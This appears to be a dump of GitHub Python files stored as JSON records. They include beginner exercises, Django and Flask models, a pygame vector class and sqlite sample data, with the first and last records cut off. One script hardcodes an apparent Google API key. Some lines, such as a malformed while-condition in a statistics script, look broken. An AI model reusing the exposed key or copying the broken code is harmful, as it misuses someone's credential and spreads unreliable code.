break\ncv2.destroyAllWindows()","repo_name":"prabhakar-sivanesan/Custom-keypoint-detection","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"72"} +{"seq_id":"32632921750","text":"\n###################### Ejercicio 1 ##############################\n'''\nConstruya un programa en Python que imprima por\npantalla la raíz cuadrada de los números múltiplos de 3 de\nla siguiente lista de valores\nlista = [10,33,9,14,18,114,12,21,50,55,60]\n'''\n\n#IMPORTAR LIBRARY\nfrom math import sqrt\n# ENTRADA\n\nlista = [10,33,9,14,18,114,12,21,50,55,60]\nmultiplosDeTres = []\nraizCuadrada = []\n# PROCESAMIENTO\n\nfor i in range(len(lista)):\n # calcular si modulo = 0 calcular la raiz cuadrada e imprimir resultado\n if lista[i] % 3 == 0:\n multiplosDeTres.append(lista[i])\n raizCuadrada.append(round(sqrt(lista[i]), 3))\n\n# SALIDA\nprint('De la lista:', lista,'los multiples de 3 son:',multiplosDeTres,'y la raiz cuadrada de estos elementos es:',raizCuadrada)\n\n\n\n###################### Ejercicio 2 ##############################\n'''\nConstruya un programa en Python que simule el sorteo de\nun juego de azar como el LOTO o el KINO\n'''\n\n#IMPORTAR LIBRARY\nfrom random import sample\n# ENTRADA\n# Genera de numeros\nlistaLoto = sorted(sample(range(1,41),6))\nlistaKino = sorted(sample(range(1,25),14))\n#numeros jugados\nnumerosLoto = sorted(sample(range(1,41),6))\nnumerosKino = sorted(sample(range(1,25),14))\n\n# PROCESAMIENTO\naciertosLoto = 0\nfor i in range(len(numerosLoto)):\n if numerosLoto[i] in listaLoto:\n aciertosLoto +=1\n\naciertosKino = 0\nfor i in range(len(numerosKino)):\n if numerosKino[i] in listaKino:\n aciertosKino +=1\n\n# SALIDA\nprint('Juego Loto')\nprint('Dado los numeros del sorteo de Loto: ',listaLoto, 'Se jugaron los siguientes numeros',numerosLoto, 'Obteniendo',aciertosLoto,'aciertos' )\n\nprint('Juego Kino')\nprint('Dado los numeros del sorteo de Kino: ',listaKino, 'Se jugaron los siguientes numeros',numerosKino, 'Obteniendo',aciertosKino,'aciertos' )\n\n\n\n###################### Ejercicio 3 ##############################\n'''\nConstruya un programa en Python que reciba como\nentrada un conjunto de valores, separados por el carácter\nespacio y entregue como resultado el promedio y la\ndesviación estándar de dichos valores\n'''\n\n# ENTRADA\n# solicitar datos\ninformacion = input('Ingrese los datos separados por espacio [Ejemplo: 1 2 3 4]\\n')\n\n# obtener informacion separada por \" \"\nnotas = []\nfor i in [n for n in informacion.split(\" \")]:\n notas.append(float(i))\n\n# PROCESAMIENTO\n\n#funcion promedio valores\ndef promedio(numeros):\n promedio = sum(numeros) / len(numeros)\n return round(promedio,2)\n\n#funcion desviacion estandar\ndef desvEst(numeros):\n numero = [float(i) for i in numeros]\n media = promedio(numeros)\n desviacion=0\n for i in range(0,len(numeros)):\n dif = ((numero[i] - media)**2)/ len(numeros) \n desviacion=dif+desviacion\n return desviacion\n\n# SALIDA \nprint(\"los datos ingresados son:\", notas)\nprint(\"El promedio para los datos ingresados es:\", promedio(notas))\nprint(\"La desviacion estandar para los datos ingresados es:\", desvEst(notas))","repo_name":"GuillermoEchague/Python-Capacitacion-USACH","sub_path":"ejercicios4.py","file_name":"ejercicios4.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16098807248","text":"import json\nimport hw_2_ch3.data_cleaner as dclean\nimport numpy as np\n#\n# q2_name_list = [\"Australia\", \"Brazil\", \"England\", \"Japan\", \"Korea\", \"Mexico\", \"Norway\", \"Sweden\", \"Taiwan\", \"United States\"]\n# q2_num_list = [2,1,1,2,9,1,1,2,2,4]\n# data_list = [tpl for tpl in zip(q2_num_list, q2_name_list)]\n\n\n# data_dict = {k:v for k,v in zip(q2_name_list,q2_num_list)}\n\ndef get_mean(data:list):\n mean = (sum(data)/len(data))\n print(\"The mean of the data set is {}/{} = {}\".format(sum(data),len(data), mean))\n return mean\n\ndef _segment_median(data:list, strt:int, stp:int):\n lo = int(np.floor((strt+stp)/2))\n hi = int(np.ceil((strt+stp)/2))\n return (data[lo]+data[hi])/2, int((lo+hi)/2)\n\ndef get_median(data:list):\n med, midx = _segment_median(data,0,len(data))\n\n quart1,q1idx = _segment_median(data,0,midx)\n quart3, q3idx = _segment_median(data,midx, len(data))\n iqr = quart3 - quart1\n return (quart1,q1idx), (med, midx), (quart3,q3idx), iqr\n\nif __name__ == \"__main__\":\n dcleaner = dclean.DataClean()\n data_list = dcleaner.get_data()\n data_list = [int(x) for x in data_list]\n # print(json.dumps(data_dict, indent=4))\n data_list.sort()\n mean_q2 = 0\n print(\"the cleaned up data_list is as follow:\\n\\t{}\".format(data_list))\n\n mean1 = get_mean(data_list)\n quart1, med, quart3, iqr = get_median(data_list)\n\n print(\"the median for this data set is {}\".format(med[0]))\n print(\"quartile 1 = {}, quartile 3 = {}, irq = {}\".format(quart1[0], quart3[0], iqr))\n outliers = []\n upper_bound = quart3[0] + iqr*1.5\n lower_bound = quart1[0] - iqr*1.5\n tarpos = 0\n target = data_list[tarpos]\n while target upper_bound and tarpos >= 0:\n tarpos -= 1\n target = data_list[tarpos]\n upper_bound = target\n for val in data_list:\n if val > upper_bound or val < lower_bound:\n outliers.append(val)\n print(\"the boundary values are [{}, {}]\".format(lower_bound,upper_bound))\n print(\"the outliers are:\\n\\t{}\".format(outliers))\n if len(outliers) > 0:\n trunc_data = [val for val in data_list if val not in outliers]\n mean2 = get_mean(trunc_data)\n q1,m,q3,tiqr = get_median(trunc_data)\n print(\"the median for this data set is {}\".format(m[0]))\n","repo_name":"RyanCPeters/UWB_FALL_2018","sub_path":"stmath341_stats/custom_code_tools/hw_2_ch3/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4864589746","text":"# this is the parent class that has all the attributes to be inherited by the child classes.\nimport csv\nclass Users:\n def __init__(self, fname='', lname='', user_id='', user_pin='', phone_no=''):\n self.fname = fname # first name\n self.lname = lname # last name\n self.user_id = user_id # unique identifier for the user\n self.user_pin = user_pin # unique password for each user\n self.phone_no = phone_no # contact of the user\n\n# using this class we will be creating objects of the agents that will be using this platform\n# this class inherits its attributes from the User class\n\n\nclass Agents(Users):\n # in this constructor we initialize the attributes that the agent will we having and use the super innit to inherit\n def __init__(self, fname='', lname='', user_id='', user_pin='', phone_no=''):\n super().__init__(fname, lname, user_id, user_pin, phone_no)\n self.houses = []\n\n# this method returns the houses for a particular agent that is stored in the self.houses\n def get_house(self, user_ID):\n # this variable count is created so that if that particular id is not found the user will be told that he\n # doesnt have a house, it will remain zero but if it is found +=1\n found = 0\n count = 0\n with open(\"houses1.csv\", \"r\") as acsvfile:\n reader = csv.DictReader(acsvfile)\n # the for loop iterates through the file checking if the agent's id in the file is the same as the the id\n # that is provided, if it finds the id that are similar, the houses with those ids will be printed\n for row in reader:\n if row['Agent_id'] == str(user_ID):\n count += 1\n found = +1\n print(\n f\"House ID: {row['house_id']}, Number of rooms: {row['room_no']}, Location: {row['location']},\"\n f\" Price: {row['price']}, Your Phone Number: {row['agents_no']}\")\n\n if found == 0:\n print(\"You don't have any house\")\n return found\n\n# this is a method that allows an agent to add a house and pass all the attributes of the house\n def add_house(self, house_id='', no_rooms='', location='', price='', agents_number=''):\n house_data = [house_id, no_rooms, location, price, agents_number]\n # this house created is updated to the dictionary created for the agent\n self.houses = (house_data)\n return self.houses[0]\n\n# this method allows the agent to remove a house, the agent provides the house id which is the key in the dictionary\n def remove_house(self, user_ID, house_ID):\n # we need to access the houses that we stored in the csv file\n # we first open the file in read mode\n result = 1\n file = open('houses1.csv', 'r')\n reader = csv.reader(file)\n # we create an empty list that will hold the houses temporarily\n list = []\n # we take the user ID and the house id which the user wants to remove, this will be used in comparing\n # the user input with the information that is in the csv file. if the information corresponds the house will\n # be removed from the csv file to the empty list\n # this if found variable is used to indicate if the the data is in the csv file or not\n IfFound = False\n for row in reader:\n if row[1] == str(house_ID) and row[0] == str(user_ID):\n IfFound = True\n #result= 1\n print(f\"you have successfully removed house with ID: {house_ID}\")\n else:\n list.append(row)\n file.close()\n\n # IfFound remains false that means that the information was not found and the print statement below is printed\n if IfFound == False:\n print('Invalid house id or user ID')\n\n else: # if it is found the the file is opened again and written with the information that remained in the list\n # after the house has been removed\n\n file = open('houses1.csv', 'w+', newline='')\n writer = csv.writer(file)\n writer.writerows(list)\n file.close()\n return IfFound\n\n\n# this method is for the agent to update the price of the house and his number if he/she changes it\n def update_house(self, user_ID, house_ID):\n print('Type 1 to update Price\\nType 2 to update your phone number')\n # the agent picks that he/she wants to update\n toUpdate = input(\"ENTER: \")\n # the user ID is also provided for comparison purposes between the input of the user and if the data is there\n # in the csv file that is being accessed by the agent\n #user_ID = int(input(\"Enter your user ID for authentication: \"))\n # if the input of the user above was to update the price of the house ot brings him here\n if toUpdate == '1':\n\n # the user has to enter the house id of the house that he wants to update\n #house_id = int(input(\"ENTER House ID: \"))\n # the csv file is opened\n file = open('houses1.csv', 'r')\n reader = csv.reader(file)\n # we create an empty list where we will store the data form the csv temporarily\n list = []\n # we will also take the id of the user to make sure that the agent id and the house id matches\n # so that the no other person can update the house\n # the IfFound variable indicated if the data is there in the csv file or not\n IfFound = False\n # the for loop iterates over the data to check if the data is there\n for row in reader:\n if row[1] == str(house_ID) and row[0] == str(user_ID):\n # if the data that matches is both in the csv file and the user input, the variable that\n # we had changes to True\n IfFound = True\n # since the data is found, we create a variable that asks the what is the new price of the house\n new_Price = input(\"Enter New Price: \")\n # the price element is the forth on the list, so we access the element in the list as shown below\n row[4] = new_Price\n # we then append the record then close it\n list.append(row)\n file.close()\n if IfFound == False:\n print('Invalid house id or user ID')\n else:\n file = open('houses1.csv', 'w+', newline='')\n writer = csv.writer(file)\n writer.writerows(list)\n file.close()\n return IfFound\n elif toUpdate == '2':\n # the csv file is opened\n file = open('houses1.csv', 'r')\n reader = csv.reader(file)\n # we create an empty list where we will store the data form the csv temporarily\n list = []\n # we will also take the id of the user to make sure that the agent id and the house id matches\n # so that the no other person can update the house\n # the IfFound variable indicated if the data is there in the csv file or not\n IfFound = False\n for row in reader:\n # the for loop iterates over the data to check if the data is there\n if row[0] == str(user_ID):\n # if the data that matches is both in the csv file and the user input, the variable that\n # we had changes to True\n IfFound = True\n # since the data is found, we create a variable that asks the what is the new price of the house\n new_Number = input(\"Enter New Number: \")\n # the number element is the fifth on the list, so we access the element in the list as shown below\n row[5] = new_Number\n # we then append the record then close it\n list.append(row)\n file.close()\n # if data is not found the statement below is printed\n if IfFound == False:\n print('Invalid user ID or check if you have houses')\n else:\n # if the house is found, the file is opened again and the information that eas updated is\n # updated to the csv file\n file = open('houses1.csv', 'w+', newline='')\n writer = csv.writer(file)\n writer.writerows(list)\n file.close()\n return IfFound\n else:\n print(\"Wrong input\")\n\n\n # this method is for displaying the information of agent, it fetches the data from teh csv file that stored the\n # objects of agents when they were being created\n def get_User_Info(self, user_PIN):\n # we are taking the id so that we can fetch the information of that particular agent\n\n count = 0\n # the csv file is opened in read mode since we just want to view the information\n found = 0\n with open(\"agents1.csv\", \"r\") as acsvfile:\n reader = csv.DictReader(acsvfile)\n # the for loop iterates over the data\n for row in reader:\n # if data in the cv matches that of agents input, the information of the agent is printed\n if row['user_pin'] == str(user_PIN):\n found = 1\n print(f\"Your info:\\nuser_id:{row['user_id']}\\nfirst_name:{row['user_fname']}\\nlname:{row['user_lname']}\\nphone_no:{row['user_phone_no']}\")\n count += 1\n if found == 0:\n print(\"Your user ID is incorrect, check your user ID\")\n return found\n","repo_name":"kiplangatmike/Find-Your-House-App","sub_path":"module/summative_users_parents_class.py","file_name":"summative_users_parents_class.py","file_ext":"py","file_size_in_byte":9735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10564137535","text":" # -*- coding: utf-8 -*-\n\nimport re\nfrom django.contrib.auth.models import User\nfrom openid.consumer.consumer import SUCCESS\n#from django.core.mail import mail_admins\n\n\nclass OpenIDBackend:\n def authenticate(self, openid_response):\n if openid_response is None:\n return None\n\n if openid_response.status != SUCCESS:\n return None\n\n email = openid_response.getSigned('http://openid.net/srv/ax/1.0', 'value.email')\n first_name = openid_response.getSigned('http://openid.net/srv/ax/1.0', 'value.firstname')\n last_name = openid_response.getSigned('http://openid.net/srv/ax/1.0', 'value.lastname')\n username = re.findall(r'^(.+?)@', email)[0]\n\n try:\n user = User.objects.get(email=email)\n\n except User.DoesNotExist:\n user = User.objects.create_user(username, email)\n user.first_name = first_name\n user.last_name = last_name\n user.save()\n\n return user\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None\n","repo_name":"perenecabuto/contas","sub_path":"possessions/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33440847202","text":"from marshmallow import fields\n\nfrom todo.extension import database, marshmallow\nfrom todo.validators.common import cannot_be_empty\nfrom todo.validators.task import is_in_allowed_priority_range\n\n\nclass Task(database.Model):\n __tablename__ = 'tasks'\n\n id = database.Column(database.Integer, primary_key=True)\n user_id = database.Column(database.Integer,\n database.ForeignKey(\n 'users.id',\n ondelete='CASCADE'\n ),\n nullable=False)\n title = database.Column(database.String, nullable=False)\n description = database.Column(database.String, nullable=True)\n priority = database.Column(database.Integer, nullable=False)\n add_time = database.Column(database.DateTime, nullable=False)\n active = database.Column(database.Boolean, default=True)\n\n\nclass TaskSchema(marshmallow.Schema):\n id = fields.Integer(dump_only=True)\n user_id = fields.Integer(validate=[cannot_be_empty])\n title = fields.String(validate=[cannot_be_empty])\n description = fields.String()\n priority = fields.Integer(validate=[is_in_allowed_priority_range])\n add_time = fields.DateTime(dump_only=True)\n active = fields.Boolean(default=True)\n\n\ntask_schema = TaskSchema()\ntasks_schema = TaskSchema(many=True)\n","repo_name":"NorbertOzga/flask_todo_app","sub_path":"todo/models/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25048977850","text":"with open(\"data.txt\", \"r\") as f:\n d = f.readlines()\nd = [i.replace('\\n','') for i in d]\nd = ''.join(d)\n\n\nwith open(\"clock.txt\", \"r\") as f:\n c = f.readlines()\nc = [i.replace('\\n','') for i in c]\nc = ''.join(c)\n\n","repo_name":"DRSOQUA/manualTransmission-complete","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26044681342","text":"from django.template import Library\nfrom django.utils.safestring import mark_safe\n\nregister = Library()\n\n\n@register.simple_tag()\ndef render_stars(stars):\n if int(stars) == 0:\n return \"\"\n full_stars = '' * int(stars)\n half_star = (\n '' if stars % 1 == 0.5 else \"\"\n )\n return mark_safe(\n '
    {}{}
    '.format(full_stars, half_star)\n )\n","repo_name":"EduardoZepeda/django-gis-coffee","sub_path":"shops/templatetags/render_stars.py","file_name":"render_stars.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42802856891","text":"import urllib\n\nfrom googleapiclient import discovery\nfrom PIL import Image\n\n\nclass ImageSearch(object):\n CUSTOM_SEARCH_API = 'AIzaSyBFoF4sDsSj6FV8O-cYsyHbU9stfIrACJg'\n MENU_PICTURE_CSE = '000057874177480001711:2ywzhtb3u6q'\n\n def __init__(self):\n self.service = discovery.build('customsearch',\n 'v1',\n developerKey=self.CUSTOM_SEARCH_API)\n\n def Search(self, text, num=5):\n response = self.service.cse().list(q=text,\n cx=self.MENU_PICTURE_CSE,\n searchType='image',\n safe='high',\n num=num).execute()\n image_link_list = []\n if not response or 'items' not in response:\n return None\n\n for item in response['items']:\n if 'link' in item and 'image':\n image_link_list.append(item['link'])\n\n return image_link_list\n\n\ndef main():\n num = 5\n thumbnail_size = (400, 300)\n background = Image.new('RGBA', (thumbnail_size[0], thumbnail_size[1] * num),\n (255, 255, 255, 255))\n image_search = ImageSearch()\n image_link_list = image_search.Search('grilled steak', num=num)\n for i, image_link in enumerate(image_link_list):\n tmp_image_file = '/tmp/img%d' % i\n urllib.urlretrieve(image_link, tmp_image_file)\n im = Image.open(tmp_image_file)\n im.thumbnail(thumbnail_size)\n offset = (0, thumbnail_size[1] * i)\n background.paste(im, offset)\n background.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wenjiesha/menu_picture","sub_path":"python/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9096581139","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: enfantbenidedieu\n\"\"\"\nimport setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"scientistmetrics\", \n version=\"0.0.3\",\n author=\"Duverier DJIFACK ZEBAZE\",\n author_email=\"duverierdjifack@gmail.com\",\n description=\"Python package for metrics and scoring : quantifying the quality of predictions\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/enfantbenidedieu/scientistmetrics\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.10',\n)","repo_name":"enfantbenidedieu/scientistmetrics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26625855935","text":"import sqlite3\nimport random\n\n\ndef gerar_cod_funcionarios():\n return random.randint(1, 11)\n\n\n# função para gerar cpf aleatorio --\ndef gerar_cpf():\n return random.randint(100_000_000, 999_999_999)\n\n\n# função para gerar rg aleatorio --\ndef gerar_rg():\n return random.randint(10_000_000, 99_999_999)\n\n\n# gera data de nascimento aleatoria --\ndef gerar_data_nascimento():\n return random.randint(1970, 2005)\n\n\n# gera cep aleatorio --\ndef gerar_cep():\n return random.randint(10000, 99999)\n\n\n# gera telefone aleatorio --\ndef gerar_telefone():\n return random.randint(900000000, 999999999)\n\n\n# Gera codigo do departamento aleatorio\ndef gerar_cod_departamento():\n return random.randint(1, 5)\n\n\n# gera uma funções aleatorias --\ndef gerar_funcoes():\n funcoes = [\"Analista\", \"Desenvolvedor\", \"Gerente\", \"Coordenador\", \"Assistente\"]\n return random.choice(funcoes)\n\n\n# gera um salario aleatorio --\ndef gerar_salario():\n return random.randint(3000, 10000)\n\n\n# cria a tablea \"Funcionarios\" no banco de dados --\ndef criar_tabela_funcionario():\n banco = sqlite3.connect(\"dados_funcionarios.db\")\n\n cursor = banco.cursor()\n\n cursor.execute(\"\"\"CREATE TABLE Funcionarios(\n cod_funcionarios INTEGER PRIMAY KEY NOT NULL,\n primeiro_nome VARCHAR NOT NULL,\n ultimo_nome VARCHAR NOT NULL,\n data_nasci INTEGER NOT NULL,\n CPF INTEGER NOT NULL,\n RG INTEGER NOT NULL,\n Endereco VARCHAR NOT NULL,\n CEP INTEGER NOT NULL,\n cidade VARCHAR NOT NULL,\n fone INTEGER NOT NULL,\n Cod_depart INTEGER NOT NULL,\n funcao VARCHAR NOT NULL,\n salario INTEHER NOT NULL\n )\"\"\")\n\n banco.commit()\n\n\n# Insere os dados na tabela\ndef inserir_dados_no_danco():\n banco = sqlite3.connect(\"dados_funcionarios.db\")\n cursor = banco.cursor()\n\n for i in range(1, 11): # Inserir Dados, 10 Funcionarios\n cod_funcionarios = gerar_cod_funcionarios()\n primeiro_nome = f\"Funcionarios{i}\"\n ultimo_nome = f\"Sobrenome{i}\"\n data_nasci = gerar_data_nascimento()\n cpf = gerar_cpf()\n rg = gerar_rg()\n endereco = f\"Endereço{i}\"\n cep = gerar_cep()\n cidade = f\"Cidade{i}\"\n fone = gerar_telefone()\n cod_depart = gerar_cod_departamento()\n funcao = gerar_funcoes()\n salario = gerar_salario()\n\n cursor.execute(\"\"\"INSERT INTO Funcionarios (cod_funcionarios, primeiro_nome, ultimo_nome, data_nasci, CPF, RG,\n Endereco, CEP, cidade, fone, Cod_depart, funcao, salario)\n VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)\"\"\",\n (\n cod_funcionarios, primeiro_nome, ultimo_nome, data_nasci, cpf, rg, endereco, cep,\n cidade, fone, cod_depart, funcao, salario))\n\n banco.commit()\n\n\n# Executa as funções para criar a tabela e inserir os dados no banco\ncriar_tabela_funcionario()\ninserir_dados_no_danco()\n\n\ndef criar_tabela_departamento():\n banco = sqlite3.connect(\"dados_funcionarios.db\")\n cursor = banco.cursor()\n\n cursor.execute(\"\"\"CREATE TABLE Departamentos(\n cod_depart INTEGER PRIMARY KEY NOT NULL,\n nome_depart VARCHAR NOT NULL,\n localização VARCHAR NOT NULL,\n cod_funcionario_gerente INTEGER NOT NULL\n )\"\"\")\n\n banco.commit()\n\n\ndef inserir_dados_departamento():\n Departamentos = [\n {\"nome_depart\": \"RH\", \"localização\": \"Andar 1\", \"cod_funcionario_gerente\": 1},\n {\"nome_depart\": \"TI\", \"localização\": \"Andar 2\", \"cod_funcionario_gerente\": 2},\n {\"nome_depart\": \"Financiero\", \"localização\": \"Andar 3\", \"cod_funcionario_gerente\": 3},\n {\"nome_depart\": \"Vendas\", \"localização\": \"Andar 4\", \"cod_funcionario_gerente\": 5},\n {\"nome_depart\": \"Produção\", \"localização\": \"Andar 5\", \"cod_funcionario_gerente\": 6}\n ]\n\n banco = sqlite3.connect(\"dados_funcionarios.db\")\n cursor = banco.cursor()\n\n for i, Departamentos in enumerate(Departamentos, start=1):\n cursor.execute(\"\"\"INSERT INTO Departamentos(cod_depart, nome_depart, localização, cod_funcionario_gerente)\n VALUES (?,?,?,?)\"\"\",\n (i, Departamentos[\"nome_depart\"],\n Departamentos[\"localização\"], Departamentos[\"cod_funcionario_gerente\"]))\n\n banco.commit()\n\n\ncriar_tabela_departamento()\ninserir_dados_departamento()\n","repo_name":"Z44CK/Codes_2023","sub_path":"Estrutura de Dados/db_atividade/dados_funcionarios.py","file_name":"dados_funcionarios.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24211352200","text":"import pygame as pg\nfrom . import iobjects\nfrom . import mymath\nimport math\nfrom copy import deepcopy\n\n\nclass Circle(iobjects.BaseObject):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.draw = pg.draw.ellipse\n\n\n def render(self):\n self.draw(self.screen,\n self.color,\n [self.pos.x,\n self.pos.y,\n self.width,\n self.height],\n self.border)\n\n\nclass Box(iobjects.BaseObject):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.draw = pg.draw.rect\n\n\n def render(self):\n self.draw(self.screen,\n self.color,\n [self.pos.x,\n self.pos.y,\n self.width,\n self.height],\n self.border)\n\n\nclass Line(iobjects.BaseObject):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.end_pos = iobjects.BasePosition(x=self.width, y=self.height)\n self.draw = pg.draw.line\n\n\n def render(self):\n self.draw(self.screen,\n self.color,\n [self.pos.x,\n self.pos.y,\n ],\n [self.end_pos.x,\n self.end_pos.y,\n ],\n self.border)\n\n\nclass Angle:\n def __init__(self, angle: int):\n self.angle = angle\n\n def set(self, other):\n self.angle = other\n self.__check()\n\n def copy(self):\n return deepcopy(self)\n\n def opposite(self):\n copy = self.copy()\n copy -= 180\n return copy\n\n\n def __check(self):\n while self.angle < 0 or self.angle > 360:\n\n if self.angle > 360:\n self.angle -= 360\n\n if self.angle < 0:\n self.angle = 360 - abs(self.angle)\n\n\n def __str__(self):\n return f\"Angle: {self.angle}\"\n\n\n def __add__(self, other):\n copy = self.copy()\n copy.angle += other\n copy.__check()\n return copy\n\n\n def __sub__(self, other):\n copy = self.copy()\n copy.angle -= other\n copy.__check()\n return copy\n\n\n def __mul__(self, other):\n copy = self.copy()\n copy.angle *= other\n copy.__check()\n return copy\n\n\n def __floordiv__(self, other):\n copy = self.copy()\n copy.angle //= other\n copy.__check()\n return copy\n\n\n def __truediv__(self, other):\n copy = self.copy()\n copy.angle /= other\n copy.__check()\n return copy\n\n\n def __mod__(self, other):\n copy = self.copy()\n copy.angle %= other\n copy.__check()\n return copy\n\n\nclass Vector(object):\n def __init__(self, x: int = 0, y: int = 0, length: int = 0, angle: int = 0, *a, **kw):\n self.pos = iobjects.BasePosition(x=x, y=y)\n self.end_pos = iobjects.BasePosition()\n self.length = length\n #self.angle = angle\n self.angle = Angle(angle)\n self._calc_endpoint()\n\n\n def _calc_endpoint(self):\n self.end_pos.x, self.end_pos.y = mymath.endpoint(x=self.pos.x, y=self.pos.y, length=self.length, angle=self.angle.angle)\n\n\n def copy(self):\n return self\n #return deepcopy(self)\n\n\n def update_length(self):\n self.length = mymath.length_by_points(x1=self.pos.x,\n y1=self.pos.y,\n x2=self.end_pos.x,\n y2=self.end_pos.y)\n\n\n def __add__(self, other):\n copy = self.copy()\n\n if isinstance(other, int):\n copy.length += other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n other.pos.x = copy.end_pos.x\n other.pos.y = copy.end_pos.y\n other._calc_endpoint()\n\n copy.end_pos.x = other.end_pos.x\n copy.end_pos.y = other.end_pos.y\n\n copy.update_length()\n\n copy.angle.set(mymath.angle_by_point(x1=copy.pos.x,\n y1=copy.pos.y,\n x2=copy.end_pos.x,\n y2=copy.end_pos.y))\n\n #copy._calc_endpoint()\n return copy\n\n\n def __sub__(self, other):\n copy = self.copy()\n if isinstance(other, int):\n copy.length -= other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n return copy + (-other)\n\n\n def __neg__(self):\n copy = self.copy()\n copy.pos.x, copy.end_pos.x = copy.end_pos.x, copy.pos.x\n copy.pos.y, copy.end_pos.y = copy.end_pos.y, copy.pos.y\n copy.angle = copy.angle.opposite()\n return copy\n\n\n def __mul__(self, other):\n copy = self.copy()\n if isinstance(other, int):\n copy.length *= other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n raise NotImplementedError\n\n\n def __truediv__(self, other):\n copy = self.copy()\n if isinstance(other, int):\n copy.length /= other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n raise NotImplementedError\n\n\n def __floordiv__(self, other):\n copy = self.copy()\n if isinstance(other, int):\n copy.length //= other\n copy._calc_endpoint()\n return copy\n\n elif isinstance(other, Vector):\n raise NotImplementedError\n\n\n def __str__(self):\n return f\"Vector: (x={self.pos.x}, y={self.pos.y},\\n\\tend x={self.end_pos.x}, end y={self.end_pos.y},\\n\\tlen={self.length}, angle={self.angle}\"\n\n\nclass VectorLine(Vector, Line):\n def __init__(self, *a, **kw):\n super(Vector, self).__init__(*a, **kw)\n super().__init__(*a, **kw)\n\n\nclass BaseSprite(iobjects.IBaseSprite):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.image = None\n\n if self.filename:\n self.image = pg.image.load(self.filename).convert_alpha()\n\n else:\n self.image = pg.Surface((self.width, self.height))\n\n self.rect = self.image.get_rect(x=self.x, y=self.y)\n\n\n def render(self):\n \"\"\"Draw object on screen\"\"\"\n self.screen.blit(self.image, self.rect)\n\n\n","repo_name":"KonnorFrik/pygame_wrap","sub_path":"base_objects.py","file_name":"base_objects.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4329554222","text":"import time\nfrom functools import partial\n\nfrom sepal_ui import sepalwidgets as sw\nfrom sepal_ui import color as sc\nfrom sepal_ui.scripts import utils as su\nimport ipyvuetify as v\nimport ee\n\nfrom component.message import cm\nfrom component import scripts as cs\nfrom component import parameter as cp\n\nee.Initialize()\n\n\nclass LaunchTile(sw.Tile):\n def __init__(self, aoi_tile, model, result_tile):\n # gather the model objects\n self.aoi_model = aoi_tile.view.model\n self.model = model\n self.attributes = {\"id\": \"launch_tile\"}\n\n # add the result_tile map to attributes\n self.m = result_tile.m\n self.tile = result_tile\n\n # create the widgets\n mkd = sw.Markdown(cm.process_txt)\n\n # create the tile\n super().__init__(\n \"compute_widget\",\n cm.tile.launch,\n inputs=[mkd],\n btn=sw.Btn(cm.launch_btn, class_=\"mt-5\"),\n alert=sw.Alert(),\n )\n\n # link the js behaviours\n self.btn.on_event(\"click\", self._launch_fcdm)\n aoi_tile.view.observe(self._update_geometry, \"updated\")\n\n def _update_geometry(self, change):\n \"\"\"update the map widget geometry\"\"\"\n\n self.tile.save.geometry = self.aoi_model.feature_collection.geometry()\n\n return self\n\n @su.loading_button(debug=True)\n def _launch_fcdm(self, widget, event, data):\n # test all the values\n if not self.alert.check_input(self.aoi_model.name, cm.missing_input):\n return\n for k, val in self.model.export_data().items():\n if not (\n \"forest_mask\" in k\n or self.alert.check_input(val, cm.missing_input.format(k))\n ):\n return\n\n # read the value\n # make the difference between preselected and assets\n self.model.forest_map = (\n self.model.forest_map[\"value\"]\n if type(self.model.forest_map) == dict\n else self.model.forest_map\n )\n\n # check the validity of the forest mask\n # cs.check_forest_mask(self.model.forest_map, 